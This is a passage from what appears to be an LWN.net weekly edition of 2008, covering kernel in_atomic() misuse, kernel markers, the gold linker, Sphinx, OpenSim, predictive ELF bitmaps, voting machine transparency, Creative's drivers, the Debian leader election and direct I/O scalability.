number of rules, including (1) no access to user space, and,
crucially, (2) no sleeping.  Problems can result, though, when a
particular kernel function does not know which context it might be invoked
in.  The classic example is kmalloc() and friends, which take an
explicit argument (GFP_KERNEL or GFP_ATOMIC) specifying
whether sleeping is possible or not.


The wish to write code which can work optimally in either context is
common, though.  Some developers, while trying to write such code, may well
stumble across the following definitions from
&lt;linux/hardirq.h&gt;:


It would seem that in_atomic() would fit the bill for any
developer trying to decide whether a given bit of code needs to act in an
atomic manner at any specific time.  A quick grep through the kernel
sources shows that, in fact, in_atomic() has been used in quite a
few different places for just that purpose.
There is only one problem: those uses are almost certainly all wrong.  


The in_atomic() macro works by checking whether preemption is
disabled, which seems like the right thing to do.  Handlers for events like
hardware interrupts will disable preemption, but so will the
acquisition of a spinlock.  So this test appears to catch all of the cases
where sleeping would be a bad idea.  Certainly a number of people who have
looked at this macro have come to that conclusion.

But if preemption has not been configured into the kernel in the first
place, the kernel does not raise the "preemption count" when spinlocks are
acquired.  So, in this situation (which is common - many distributors still
do not enable preemption in their kernels), in_atomic() has no way
to know if the calling code holds any spinlocks or not.  So it will return
zero (indicating process context) even when spinlocks are held.  And that
could lead to kernel code thinking that it is running in process context
(and acting accordingly) when, in fact, it is not.  


Given this problem, one might well wonder why the function exists in the
first place, why people are using it, and what developers can really do to
get a handle on whether they can sleep or not.  Andrew Morton answered the first question in a relatively
cryptic way:


	in_atomic() is for core kernel use only.  Because in special
	circumstances (ie: kmap_atomic()) we run inc_preempt_count() even
	on non-preemptible kernels to tell the per-arch fault handler that
	it was invoked by copy_*_user() inside kmap_atomic(), and it must
	fail.


In other words, in_atomic() works in a specific low-level
situation, but it was never meant to be used in a wider context.  Its
placement in hardirq.h next to macros which can be used
elsewhere was, thus, almost certainly a mistake.  As Alan Stern pointed out, the fact that Linux
Device Drivers recommends the use of in_atomic() will not have
helped the situation.  Your editor recommends that the authors of that book
be immediately sacked.

Once these mistakes are cleared up, there is still the question of just
how kernel code should decide whether it is running in an atomic context or
not.  The real answer is that it just can't do that.  Quoting Andrew Morton again:


	 The consistent pattern we use in the kernel is that callers keep
	 track of whether they are running in a schedulable context and, if
	 necessary, they will inform callees about that.  Callees don't
	 work it out for themselves.


This pattern is consistent through the kernel - once again, the GFP_
flags example stands out in this regard.  But it's also clear that this practice has
not been documented to the point that kernel developers understand that
things should be done this way.  Consider this recent
posting from Rusty Russell, who understands these issues better than
most:


	This flag indicates what the allocator should do when no memory is
	immediately available: should it wait (sleep) while memory is freed
	or swapped out (GFP_KERNEL), or should it return NULL immediately
	(GFP_ATOMIC). And this flag is entirely redundant: kmalloc() itself
	can figure out whether it is able to sleep or not.


In fact, kmalloc() cannot figure out on its own whether sleeping
is allowable or not.  It has to be told by the caller.  This rule is
unlikely to change, so expect a series of in_atomic() removal
patches starting with 2.6.26.  Once that work is done, the
in_atomic() macro can be moved to a safer place where it will not
create further confusion.

		Kernel markers and binary-only modules


Kernel markers are a
mechanism which allows developers to put static tracepoints into the
kernel.  Once placed, these markers can be used by operations staff to
trace well-known events in running systems without that staff having to
know about kernel code.  Solaris provides a long list of static tracepoints
for use with Dtrace, but Linux, thus far, has none.  That situation should
eventually change - static markers were only merged into the mainline in
2.6.24.  But, as the developers start to look more seriously at markers,
some interesting issues are coming up.

One of those emerged as a result of this
patch from Mathieu Desnoyers which allows proprietary modules to
contain markers.  The fact that current kernels do not recognize markers in binary-only
modules is mostly an accident: markers are disabled in modules with any sort
of taint flag set as a way to prevent kernel crashes - a kernel oops being
a rather heavier-weight marker than most people wish to encounter.
Matthieu tightened that test in a way that allows markers in proprietary
modules, saying "let's see how people react."  Needless to
say, he saw.


One might well wonder why the kernel developers, not known for their
sympathy toward proprietary modules in general, would want to consider
letting those modules include static tracepoints.  The core argument here
is that static markers allow proprietary modules to export a bit more
internal information to the kernel, and to their users.  It is seen as a
sort of (very) small opening up on the part of the proprietary module
writer.  Mathieu says:


	I think it's only useful for the end user to let proprietary
	modules open up a bit, considering that proprietary module writers
	can use the markers as they want in-house, but would have to leave
	them disabled on shipped kernels.


The idea is that, by placing these tracepoints, module authors can help
others learn more about what's going on inside the module and help people
track down problems.  The result should be a more stable kernel which -
whether proprietary modules have been loaded or not - is generally
considered to be a good thing.


On the other hand, there's no shortage of developers who are opposed to
extending any sort of helping hand to binary module authors.  Giving those
modules more access to Linux kernel internals, it is argued, only leads to
trouble.  Ingo Molnar put it this way:


	Why are we even arguing about this? Binary modules should be as
	isolated as possible - it's a totally untrusted entity and history
	has shown it again and again that the less infrastructure coupling
	we have to them, the better.


Ingo also worries that allowing binary modules to use markers will serve to
make the marker API that much harder to change in the future.  Since that
API is quite young, chances are good that changes will happen.  As much as
the kernel developers profess not to care about binary-only modules, the
fact of the matter is that there are good reasons to avoid breaking those
modules.  The testing community certainly gets smaller when testers cannot
load the modules they need to make their systems work in the manner to
which they have become accustomed.  So it is possible that allowing
proprietary modules to use markers could make the marker API harder to fix
in future kernel releases.

The grumbles have been loud enough that Matthieu's patch will probably not
be merged for 2.6.25.  The idea is likely to come back again, but
not necessarily right away: the marker feature may have been merged in
2.6.24, but it would appear that 2.6.25 will be released with no actual
markers defined in the source.  It's not clear that binary-only module
authors are pushing to add tracepoints when none of the other developers
are doing so.  Until somebody starts actually using static markers, debates
on where they can be used will continue to be of an academic nature.

		Distribution-friendly projects - Part 1


[Editor's note: This article, which looks at the interactions of
software projects and distribution providers, will be presented in three
parts.]

Introduction
In today's world most users of Linux don't build their system from scratch
by downloading the sources of the applications and libraries they need and
building them by hand.  Most users will use one or more distributions (the
ones that best suit their needs), and they'll stick with the packages
provided by the distribution for as long as they can.

<!-- LWNPutAdHere -->
Power users may know how to get the software they want and build it so it
runs, but the average user won't go around looking for software that is not
readily available to them. The job of a distribution is, of course, to
provide as much software as its users will need, sometimes changing the
software so that it suits the needs of its users better.

The distribution's developers, the so-called downstream
  developers, have different responsibilities compared to the
original software developers, the upstream developers. The former are
responsible directly to their users, while the latter are usually more
focused on implementing their software correctly for their own
standards (which means for instance implementing a protocol exactly as
described by the standard, or supporting a file format exactly as it
should be).

Most of the time, these two objectives are compatible with one
another, and users face an interface that hides the details of the
implementation.  Sometimes though there are user requests that
upstream developers won't acknowledge, for instance: to parse a
file that was written improperly by a commonly-used tool (maybe a
proprietary tool that does not support free software).  In these cases,
some distributions tend to edit the source, creating a modified version for
that particular distribution, with a different behaviour, interface, or
what not.

It's because of cases like this, especially in the last few
years, that there have been many arguments between original developers and
distributions, which sometimes involved legal threats, forks or
removal of software from distributions' repositories. It's not fun to
watch these arguments going by, and sometimes it's all because of
differences in opinion between the developers, or in how their
experiences have affected their views.

Starting with the idea that everybody wants to have the software they
wrote used, this article will try to explain what distributors want
and why they ask the original developers to cooperate toward that
goal. People who worked both as an upstream developer and as a
downstream maintainer usually know what is being done with
their code in a distribution and why. For people who have only seen
one side, understanding of the needs or the reasons of the other side might
be a very difficult task.

Technical and philosophical needs The majority of the
points where upstream and downstream have different
views can be divided into technical and philosophical
points. On the technical side, distributors need to make the
software build on their system, without lots of workarounds, and it should
follow the same behaviour as other software in their setup.  On the
philosophical side, they have needs relating to user requests
and expectations.  Users expect some consistency in how software looks and
behaves on their system.  Often, both of these kind of matters relate to
the policy (written or unwritten) of that distributor.

While one might actually expect a philosophical debate between
developers on formats and how to implement a protocol, it's difficult to
understand how so many arguments are caused by different technical
requests. Unfortunately even the technical needs are often different
between upstream projects and distributions. The only way to
accommodate both is to provide choices, something that more times than not
is considered bad by the upstream developers, who do not
want the complication of too many choices.

I sincerely doubt there will ever be a time when all the
upstream developers and the downstream maintainers will
be on the same page, but it is possible to at least try to understand
what the other side wants, and see if it's possible to cover their
needs, without regressing.  Even if that means increasing the complexity a
bit.  It is true that most of today's tools, in every area, are more
sophisticated and complex than their equivalent years ago (tens of years
for computer tools, hundreds of years for other areas).

[This ends part 1 of this article.  Part 2 will look at the technical
needs of distributions and the upstream developers.  Finally, part 3 will
cover the philosophical concerns and present some conclusions.  Stay tuned
for part 2, which should air in two weeks.]

		Striking gold in binutils


A new linker is not generally something that arouses much interest outside
of the hardcore development community—or even inside it—unless
it provides something especially eye-opening.  A newly released linker,
called gold has just that kind of feature, though, because it runs
up to five times as fast as its competition.  For developers who do a lot
of compile-link-test cycles, that kind of performance increase can
significantly increase their efficiency.


Linking is an integral part of code development, but it can be invisible,
as it is often invoked by the compiler.  The sidebar accompanying this
article is meant for 
non-developers or those in need of a refresher about linker operation.
For those who want to know even more, the author of gold, Ian Lance
Taylor, has a twenty-part series about linker internals on his weblog,
starting with this entry.


For Linux systems, the GNU Compiler
Collection (GCC) has been the workhorse by 
providing a complete toolchain to build programs in a number of different
languages.  It uses the ld linker from the binutils collection.  With
the announcement
that gold has been added to binutils, there are now two
choices for linking GCC-compiled programs.


A linker overview

For non-developers, a quick overview of the process that turns source code
into executable programs may be helpful.
Compilers are programs that turn C—or other high-level
languages—into object code. Linkers then collect up object
code and produce an executable.  Usually the linker will not only operate
on object code created from a project's source, but will also reference
libraries of object code—the C runtime library libc for
example.  From those objects, the linker creates an executable program that
a user can invoke from the command line.
The linker allows program code in one file
to refer to a code or data object in another file or library.  It arranges
that those references are usable at run time by
substituting an address for 
the reference to an object.  This "links" the two properly in the executable.
 Things get more complicated when
considering shared libraries, where the library code is shared by multiple
concurrent executables, but this gives a rough outline of the basics of
linker operation. 


The intent is for gold to be a complete drop-in replacement for
ld—though it is not quite there yet.  It is currently
lacking support for some command-line options and Linux kernels that are
linked with it do not boot, but those things will come.  It also currently
only supports x86 and x86_64 targets, but for many linker
jobs, gold seems to be working well.  The speed seems to be very
enticing to
some developers, with Bryan O'Sullivan saying:

When I switched to using gold as the linker, I was at first a little
surprised to find that it actually works at all. This isn't especially
common for a complicated program that's just been committed to a source
tree. Better yet, it's as fast as Ian claims: my app now links in 2.6
seconds, almost 5.4 times faster than with the old binutils linker!


Performance was definitely the goal that Taylor set for gold
development.  It supports ELF (Executable
and Linking Format) objects and runs on UNIX-like operating systems
only.  Only supporting one object/executable format, along with a fresh
start and an explicit performance goal are some of the reasons that
gold outperforms ld. 


Tom Tromey likes the
looks of the code:

I looked through the gold sources a bit. I wish everything in the GNU
toolchain were written this way. It is very clean code, nicely commented,
and easy to follow. It shows pretty clearly, I think, the ways in which C++
can be better than C when it is used well.


Because the implementation is geared for speed, Taylor used techniques that
may confuse some.
He has some concerns
about the maintainability of his implementation:

While I think this is a reasonable approach, I do not yet know how
maintainable it will be over time. State machine implementations can be
difficult for people to understand, and the high-level locking is
vulnerable to low-level errors. I know that one of my characteristic
programming errors is a tendency toward code that is overly complex, which
requires global information to understand in detail. I've tried to avoid it
here, but I won't know whether I succeeded for some time.


Overall, it seems to be getting a nice reception by the community, with
O'Sullivan commenting that he is "looking forward to the point where
gold entirely supplants the existing binutils linker. I expect that won't
take too long, once Mozilla and KDE developers find out about the
performance boost."  Once gold gets to that point, Taylor
is already thinking about concurrent
linking—running compiler and linker at the same time—as
the next big step.


There are two other ongoing projects that are working with the greater GCC
ecosystem in interesting ways: quagmire and ggx.  Quagmire is an effort to
replace the GNU configure and build system—consisting of autoconf,
automake, and libtool—with something that depends
solely on GNU make.  Currently, that system uses
various combinations of the shell, m4, and portable makefiles to make the
building and installation of programs easy—the famous
"./configure; make" command line.  The tools were written that way
to try and ensure that users did not need to install additional packages to
configure and build GNU tools.
Quagmire, which has roots in a
posting by Taylor
recognizes that GNU make is ubiquitous, so basing a
system around that makes a great deal of sense.


The ggx project is Anthony Green's step-by-step procedure to create an
entire toolchain that can build programs for a processor architecture that he is
creating as a thought
experiment.  The basic idea is to design the instruction set based on
the needs of the compiler, in this case GCC, rather than the needs of the
hardware designers.  He is using GCC's ability to be retargeted for new
architectures, along with its simulation capabilities to create a CPU that
he can write programs for.  As of this writing, he has a "hello world"
program working, along with large chunks of the GCC test suite passing.
Well worth a look.


		Introducing Sphinx, the Python documentation toolchain


The first public release of the Python
Sphinx documentation
system,
which should not be confused with the

CMU Sphinx speech recognition project,
has been announced.


Sphinx is a tool that makes it easy to create intelligent and beautiful documentation for Python projects, written by Georg Brandl and licensed under the BSD license.
It was originally created to translate the new Python documentation, but has now been cleaned up in the hope that it will be useful to many other projects. (Of course, this site is also created from reStructuredText
sources using Sphinx!)


The Sphinx
introduction
states:
"The focus is on hand-written documentation, rather than auto-generated API docs. Though there is limited support for that kind of docs as well (which is intended to be freely mixed with hand-written content), if you need pure API docs have a look at Epydoc, which also understands reST."

<!-- LWNPutAdHere -->

An interesting feature of the Sphinx web pages is the inclusion
of their own document source code.
The 
document source code from the previously mentioned Sphinx
introduction page is a good place to go to get a look at the

reStructuredText language that Sphinx uses.
More information on that language can be found in the

A ReStructuredText Primer, the

Quick reStructuredText user reference and the

reStructuredText Cheat Sheet.


The Sphinx feature list includes:


Cross-platform, works under a variety of operating systems.
 Support for the HTML, Windows HTML Help, and LaTeX output formats.
 Can use Jinja
from the Django project for creating
HTML templates.
 Includes semantic markup and automatic links for cross-referencing.
 The documentation tree is hierarchically structured.
 Indexes are automatically generated.
 Sphinx can optionally use the
Pygments programming language syntax highlighter.
 Supports a number of extensions for code snippet testing and more.


The Python source code and related files for
Sphinx are available for download
here.
The 
change log shows that a number of recent releases have been made.
As of this writing,
the current version is release 0.1.61950, dated March 26, 2008.


If you need to maintain a collection of web-based or
print-based project documentation, Sphinx could be a very
useful tool.


		Toward a free metaverse


Last month, an article about
another attempt to free the proprietary Ryzom game expressed
frustration with the implied idea that the free software community could
not, on its own, create a game experience comparable to Ryzom.  One of the
resulting comments took issue
with (what was seen as) a dismissive attitude toward the Second Life client
and pointed out some of the work which is being done based on that client.  So your
editor decided to take another look.  The bottom line is this: the work
being done in this area is still in an early and unstable state, but it
does have the potential to open a new frontier for free software in the
area of virtual environments.


The Second
Life client for Linux is now in a beta release.  "Beta," in this case,
means that all of the features have, in some way, been implemented; now
it's just a matter of making it all actually work.  Your editor found the
client to be slow, unwieldy, crash-prone, and very fussy about its graphics
environment.  Your editor's well-supported (in X) Intel-based desktop was
not adequate for this client, for example; the associated documentation
recommends a long list of cards which (for now) are only supported with
proprietary drivers.  Still, on the right system, the
client is able to render three-dimensional worlds with the same quality
that, well, Second Life has on any platform.


An alternative is OpenViewer, a
C#/Mono-based, BSD-licensed viewer project.  Your editor had little luck
getting this client going, but the screenshots are nice.  The developers
appear to have made significant progress toward the creation of a
functional, three-dimensional client; this is a project to watch.  Less far
along is the Aether project,
which is working on a OpenViewer-based client meant to run within Firefox;
thus far, it has a nice design diagram but not much else.


There is also RealXtend, a project
based on the Second Life client which is emphasizing performance and visual
quality.  Unfortunately, it also seems to be emphasizing Windows support,
so your editor did not give it a try.


Free software clients are certainly an important tool to have; we will not
be able to access this kind of virtual environment without them.  But it
would be a real shame if these clients simply facilitated a world where we
use free clients to access locked-down, proprietary virtual worlds on
somebody else's server.  What would be much better would be the ability to
create our own virtual worlds - using free software, of course - and to
link those worlds into a larger virtual universe.  That is the formula
which made the World Wide Web (and many other Internet services) work, and
it should certainly be applicable in this context as well.


The good news is that people are working in this area.  One project, OpenSim, has the look of
something which is about to achieve much wider awareness as its features
mature.  In short, OpenSim is a virtual world server which can be deployed
to create environments much like what one would find in Second Life.  It
works with the Second Life client and with OpenViewer as well, and it
presents a very similar experience - at least, in the virtual worlds which
have been deployed so far.  Since it's free software, it can be customized
toward the creation of different kinds of environments, including
role-playing games and such.


It is written with C# and Mono - seemingly a common choice for this kind of
software.  The Mono environment, for all its faults and potential pitfalls,
may well make it easier to create a cross-platform application with the
requisite features.


What makes OpenSim really interesting, though, is its ability to connect
servers together in a "grid" mode.  Once this is done, a virtual world is
not limited to a single entity's server (or imagination).  Servers across
the net can be interconnected into a single, larger world.  This is the
feature which has the potential to take OpenSim from another interesting
project into something which transforms the net.


There are a number of people organizing grids with OpenSim now; there is a list of public grids
on the OpenSim site.  Some of them appear to be relatively proprietary
operations offering the opportunity to buy virtual land - though subprime
loans are unavailable.  Others allow anybody connect their server
into the grid and become part of the whole.  These grids appear, in
general, to be in a sort of early adopter state at the moment, but much of
the fundamental functionality is there.  How hard could it be to make it
all work properly at this point?


The answer to that question, of course, is "quite hard."  But the fact
remains that people are working on this very interesting problem, and they
are making significant progress toward solving it.  These projects bear
watching; they may well be planting the seeds of the systems we will all be
using in the coming years.

		Predictive ELF bitmaps


When the kernel executes a program, it must retrieve the code from disk,
which it normally does by demand paging it in as required by the execution
path.  If the kernel could somehow know which pages would be needed, it
could page them in more efficiently.  Andi Kleen has posted an experimental set of patches that do just that.


Programs do not know about their layout on disk, nor is their path through
the executable file optimized to reduce seeking, but with some information
about which pages will be needed, the kernel can optimize the disk
accesses.  If one were to gather a list of the pages that get faulted in
as a program runs, that information could be saved for future runs.  It
could then be turned into a bitmap indicating which of the pages should
be prefetched.


Once you have such a bitmap, where to store it becomes a problem.  Kleen's
method uses a "hack" to the ELF format on disk, putting the bitmap at the
end of the executable.  This has a number of drawbacks: a seek to get
the info, modifying the executable each time you train, and only allowing a
single usage pattern system-wide.  It does have one very nice attribute,
though, the bitmap and executable stay in sync; if the executable changes,
due to an upgrade for instance, the bitmap would get cleared in the
process.  Alternative bitmap storage locations—somewhere in users'
home directories for example—do not have this property. 


Andrew Morton questions whether this need be done in the kernel
at all:

Can't this all be done in userspace?  Hook into exit() with an LD_PRELOAD,
use /proc/self/maps and the new pagemap code to work out which pages of
which files were faulted in, write that info into the elf file (or a
separate per-executable shadow file), then use that info the next time the
app is executed, either with an LD_PRELOAD or just a wrapper.


Ulrich Drepper
does not want to see the ELF format abused in the fashion it was for this
patch, Kleen doesn't either, but used it as an expedient.  Drepper thinks the linker
should be taught to emit a new header type which would store the bitmap. It
would be near the beginning of the ELF file, eliminating the seek.   A
problem with that approach is that old binaries would not be able to take
advantage of the technique; a re-linking would be required. 


Then the
question arises, how does that bitmap get initialized?  Drepper suggests that systemtap be used: 

To fill in the bitmaps one can
have separate a separate tool which is explicitly asked to update the
bitmap data. To collect the page fault data one could use systemtap.
It's easy enough to write a script which monitors the minor page
faults for each binary and writes the data into a file.  The binary
update tool and can use the information from that file to generate the
bitmap.


Kleen's patch walks the page tables for a process when it is exiting,
setting a bit in the bitmap if that page has been faulted in.  Drepper sees
this as suboptimal:

Over many uses of a program all kinds of
pages will be needed.  Far more than in most cases.  The prefetching
should really only cover the commonly used code paths in the program.
If you pull in everything, this will have advantages if you have that
much page cache to spare.  In that case just prefetching the entire
file is even easier.  No, such an improved method has to be more
selective.


The problem is in finding the balance between just prefetching the entire
executable—which might be very wasteful—and prefetching the
subset of pages that are most commonly used.  It will take some heuristics
to make that decision.  As Drepper points out, recording the entire runtime
of a program "will result in all the pages of a
program to be marked (unless you have a lot of dead code in the binary
and it's all located together)."


The place where Drepper sees a need for kernel support is in providing a
bitmap interface to madvise() so that any holes in the pages that
get prefetched do not get filled by the readahead mechanism.  The current interface
would require a call to madvise() for each contiguous region, which
could be add up to a large number of calls.  Both he and Morton favor the
bulk of the work being done in user space.


Overall, there is lots more work to do before "predictive bitmaps" make
their way into a Linux system—if they ever do.  To start with, some benchmarking will have to be done
to show that performance improves enough to consider making a change like
this.  David Miller expresses some pessimism about the
approach:

I wrote such a patch ages ago as well.

Frankly, based upon my experiences then and what I know now, I think
it's a lose to do this.


It is an interesting idea though, one that will likely crop up again if
this particular incarnation does not go anywhere.  Since the biggest efficiency
gain is from reducing seeks, though, it may not be interesting long-term. 
As Morton says, "solid-state disks are going to put a lot of code out
of a 
job."

		Voting machine integrity through transparency


It is hard to believe that governments would spend money on voting
equipment that they are not allowed to test, but that is
exactly what multiple counties in New Jersey appear 
to have done.  They are certainly not alone, many other places are
likely to have the same restrictions on "their" voting machines.  This begs the question:
where are the free software voting systems?


Union County wanted to ask Ed Felten to look at the voting machines it
purchased from Sequoia Voting Systems because of several
anomalies—less charitably known as miscounts—observed when using
them in the primary elections.  Once Sequoia got wind of the plan, they
emailed Felten a nastygram
because he might engage in "non-compliant analysis" of the machines in
violation of the Sequoia license.  It seems quite likely that is exactly
what Felten and the county clerk had in mind as a third-party analysis is
the only sensible way to evaluate voting machines.


Other jurisdictions have done better of late, with Felten's Freedom to
Tinker weblog noting that California has denied
certification for two voting machines from Election Systems &amp; Software
(ES&amp;S).  California Secretary of State Debra Bowen has been at the
forefront of trying to ensure
that voting machines work correctly.  LWN's home state of Colorado also
decertified
a number of voting machines, but, like the earlier California study, it
was done after those machines were purchased.  As in California, it
seems likely that Colorado will be using those machines in November.


Things are getting a little better, perhaps, but no one has, as yet, tried
to take on the four major voting machine makers with a system that is built
with security in mind.  There is no reason that the source code for a
voting machine could not be made available for study.  The voting machine
vendors claim all sorts of proprietary secret sauce in their code, but that
isn't the real reason they hide it.  Covering up their shoddy code is much more likely.


Every independent review of voting machines has found numerous,
fundamental security flaws that should make anyone with an interest in the
integrity of the election process cringe.  Many of those analyses were done
without the source code, so there is little doubt that even uglier problems
would have been found in the code itself.  It just cannot be that difficult to
produce something vastly more secure than what is made available today.


One could speculate about the motives of these companies, but instead
looking at what could be built, with mostly off-the-shelf software, is more
fruitful.  The place to start is by hiring a few good security-minded
developers, while lining up an independent review team.  One might guess
that Felten and his associates would be a good place to start.


A stripped down Linux system could very easily be the basis for a voting
machine, but other free software choices would serve just as well.  Some
user interface code for touchscreens and alternative input methods
for those with disabilities would need to be written.  Some kind of
printing output device would need to be made a part of the system so that
voter-verifiable audit trails—better yet, ballots that can be put
into a locked box—can be created.


Source code availability does not, in and of itself, ensure vote security.
That code needs to be reviewed by as many experts as can be found.  In
addition, there needs to be some mechanism to show that the source code
being reviewed is the same as that being run.


For that reason, the system itself might run on some kind of Trusted
Platform Module (TPM) chip so that interested parties can verify that
the
published code is the same as that running on the system.  If the system
runs Linux, it might use the integrity management patches
for that.  Most importantly, the outside interfaces (network, USB, PCMCIA,
etc.) to the device would either not be present or be very tightly
controlled.  Any kind of removable vote recording memory would need
adequate cryptographic safeguards to eliminate tampering between vote
taking and vote tabulating machines.


Instead of an emphasis on PR, schmoozing, and bamboozling non-technical
folks, the focus of a free software
voting system would be on transparency.  The number one goal would be to
give everyone, from the least technical voter to the Bruce Schneiers of
the world: confidence in the machines and the process.  It is hard to
fathom how anyone could want anything less.


		A creative example of the value of free drivers


Free operating systems differ from the proprietary variety in a number of
ways.  One of the differences which is most evident to all users is in the
provision of device drivers.  With free systems, device drivers are free
software, provided with the system itself.  Proprietary systems tend to
provide relatively few drivers; instead, proprietary drivers are shipped
with the hardware itself and installed separately.  Anybody who wonders
about which model works better would be well advised to look at the events of
March 28, when Creative Labs shut
down an outside developer who had been working to improve Creative's
drivers.


Creative is, of course, a long-time manufacturer of audio hardware.
Opinions vary on the quality of that hardware, but there can be no doubt
that Creative has been successful in this market.  Creative's customers
have found, though, that moving to Vista has been an unusually painful
experience, even by the standards of that particular system.  It seems that
Creative's drivers have failed to provide the same level of functionality
found in previous versions, leaving customers with crippled hardware.
Strangely enough, said customers have not been entirely pleased with this
state of affairs.


Enter a developer called "Daniel_K".  Daniel took the time to figure out
how the hardware worked and to patch Creative's drivers to, once again,
provide access to the full capability of the hardware.  He then made those
drivers available to others.  Creative hardware owners were happy about
this: somebody had finally managed to solve the problems they had been
complaining about.  One would have expected Creative to be happy too; happy
customers tend to be good for business.


That's not the way of it, though.  Instead, Creative removed links to the
fixed drivers from its forums and posted a public cease-and-desist letter.
According to Creative's Phil O'Shaughnessy:


	By enabling our technology and IP to run on sound cards for which
	it was not originally offered or intended, you are in effect,
	stealing our goods.  When you solicit donations for providing
	packages like this, you are profiting from something that you do
	not own.  If we choose to develop and provide host-based processing
	features with certain sound cards and not others, that is a
	business decision that only we have the right to make.


There can be little doubt that Creative is operating within its legal
rights here.  It has retained proprietary rights to its driver software,
and it has imposed the usual sort of "thou shalt not reverse engineer" EULA
on its users.  So, while Daniel_K may (or may not) have been able to
legally reverse engineer the driver (depending on his location), he almost
certainly did not have the right to redistribute modified versions of
Creative's drivers.  Asking for donations to help him continue this
activity will not have made him any friends at Creative either.  When
dealing with other peoples' proprietary software in this manner, one should
not be surprised to get shutdown notices.


Creative may be on solid ground legally, but it still makes sense to look
at what is going on here.  One might have attributed the driver problems to
a lack of competence at Creative, or, perhaps, to the general sort of
misery that (your editor has heard) goes along with Vista.  Instead,
Creative's crippled drivers were the result of a "business decision."
Rather than allow its customers to get the most out of the hardware they
thought they owned, Creative decided to restrict that functionality,
presumably as a way of motivating those customers to buy newer, shinier,
better-supported hardware.  Daniel_K, by making Creative's customers
happier, was threatening Creative's chosen business strategy.


Now consider a company whose hardware is supported by free drivers.  That
company lacks the ability to use crippled drivers as a tool to "encourage"
customers to replace their hardware.  Instead, that company has every
incentive to provide the best hardware possible and to ensure that said
hardware works to its fullest capability.  Such a company would welcome an
outsider who made their products work better; those outsiders would be more
likely to receive job offers than cease-and-desist letters.  Rather than
calling out the lawyers, this company could focus on the business of being
a hardware company.


Your editor knows which sort of company he would (and does) choose to buy
hardware from.  Free drivers are not just a path toward higher-quality
support, though that is typically the result.  They are not just a way to
help ensure that the kernel as a whole remains stable and debuggable.  And
free drivers are not just a way to help ensure that all can learn and benefit
from the work which was done to get the hardware working.  They are also a
way to avoid the threat of manipulation by hardware vendors who have
decided that providing the best value for customers is no longer a winning
business strategy.  That is a sort of freedom which is worth having.

		Debian Project Leader Election 2008


The Debian Project Leader election is well underway.  The debate is over
and the first call for votes has gone out.
If it seems like the process is going faster this year, that's because it
is.  Last year a constitutional
amendment to reduce the length of the DPL election process was adopted
by the developers.

There were three candidates nominated for this year's election; Marc
Brockschmidt, Raphaël Hertzog and Steve McIntyre.  Information about
this election can be found on this year's vote page.

Steve McIntyre has been a Debian Developer for more than 11 years.  During
that time he acquired a wide range of packaging experience, worked on
creating the official CDs (and DVDs) and hosting machines used by Debian.

Steve also served as Assistant Project Leader under Anthony Towns, so he
has some idea of what the job entails.  This is not the first time he's run
for DPL either.  In addition to this year's
platform, his 2006 and 2007 platforms
are also available.

While Steve has no plans to appoint a DPL team, he is willing to delegate
tasks when appropriate.  His goals include improving communications within
the project and improving the workflow, getting people to ask for help when
they need it or to step down when they can't devote enough time to the
job.

  In my opinion, a key part of working effectively is honesty. We can all
  suffer from a lack of time to do the jobs that we've promised to
  do. After all, real life has a nasty habit of intruding on our so-called
  "spare" time. So long as we don't let things delay too far, we can cope
  and still contribute. But at some point, we need to be more honest with
  ourselves and actually admit that we can't continue with the jobs that
  we've promised to do. It's a hard thing to do, but in a friendly
  community where we're all working together towards a common goal there
  should be no shame in asking for help.


Raphaël Hertzog is also no stranger to DPL elections.  He ran in 2002 and 2007, in
addition to this year.

Raphaël has proposed a small team of two other individuals (Moritz
Muehlenhoff and Lucas Nussbaum) to help him with the DPL duties.  His goals
include making Debian more visible and recruiting more contributors.

  While the number of packages in Debian increased a lot since 2001, the
  number of active developers stayed the same. We could definitely use more
  developers to continue increase the quality of our distribution (teams
  with hundreds of bugs are quite common). We made a first step with the
  Debian Maintainer proposal, but we can do more. I'm not saying that we
  should give upload rights to less skilled people: we don't want to
  compromise on quality.


He would also like to improve the core teams such as keyring managers,
NM/DAM, ftpmasters, and the press team.  Unofficial services that have
proved useful (mentors.debian.net and backports.org) should be integrated
officially into Debian.

Marc Brockschmidt has been a Debian Developer since 2004 and has been
involved in many parts of Debian since then, including helping with the New
Maintainer process, as an AM to dozens of people, at the NM Frontdesk and
working with the release team.  He also helps to manage a network of hosts
used for autobuilding, porting and other Debian-related services.
Improving communications is a popular goal for DPL candidates, but has some
thoughts on that:

  Before writing this platform, I had a look at the platforms of the past
  years and was amazed that nearly everyone talked about "improving
  communication", usually meaning that flaming shouldn't be allowed. I
  don't think this is possible - we can hardly replace all involved
  developers by cuddly stuffed animals. Good software developers have a
  strong opinion about topics dear to their heart, two good developers
  usually have two different opinions. Discussion, even bordering on
  flames, is OK - as long as it leads to a result.


He would like to see more "Bits from ..." mails on debian-devel-announce
for better internal communication.  He would also like to see better
presentation of Debian to outsiders.  Like Raphaël, he would like
backports.org to become an official Debian service.  Summer of Code has
been useful in bringing together some cool ideas with people who can work
on them.  Marc would like to see that wiki page remain active throughout
the year.  Marc admits that he doesn't have as much free time as the DPL
will take, and plans to delegate heavily, especially finding others to
present Debian to the rest of the world at conferences.

Voting for these candidates will be open until April 13 and the term
for the new DPL will start soon after, on April 17, 2008.

		Toward better direct I/O scalability


Linux enthusiasts like to point out just how scalable the system is; Linux
runs on everything from pocket-size devices to supercomputers with several
thousand processors.  What they talk about a little bit less is that, at
the high end, the true scalability of the system is limited by the sort of
workload which is run.  CPU-intensive scientific computing tasks can make
good use of very large systems, but database-heavy workloads do not scale
nearly as well.  There is a lot of interest in making big database systems
work better, but it has been a challenging task.  Nick Piggin appears to
have come up with a logical next step in that direction, though, with a
relatively straightforward set of core memory management changes.


For some time, Linux has supported direct I/O from user space.  This, too, is a scalability
technology: the idea is to save processor time and memory by avoiding the
need to copy data through the kernel as it moves between the application
and the disks.  With sufficient programming effort, the application should
be able to make use of its superior knowledge of its own data access patterns
to cache data more effectively than the kernel can; direct I/O allows that caching
to happen without additional overhead.  Large database management systems
have had just that kind of programming effort applied to them, with the
result that they use direct I/O heavily.  To a significant extent, these
systems use direct I/O to replace the kernel's paging algorithms with their
own, specialized code.


When the kernel is asked to carry out a direct I/O operation, one of the
first things it must do is to pin all of the relevant user-space pages into
memory and locate their physical addresses.  The function which performs
this task is get_user_pages():


A successful call to get_user_pages() will pin len pages
into memory, those pages starting at the user-space address start
as seen in the given mm.  The addresses of the relevant struct
page pointers will be stored in pages, and the associated VMA
pointers in vmas if it is not NULL.  


This function works, but it has a problem (beyond the fact that it is a
long, twisted, complex mess to read): it requires that the caller hold
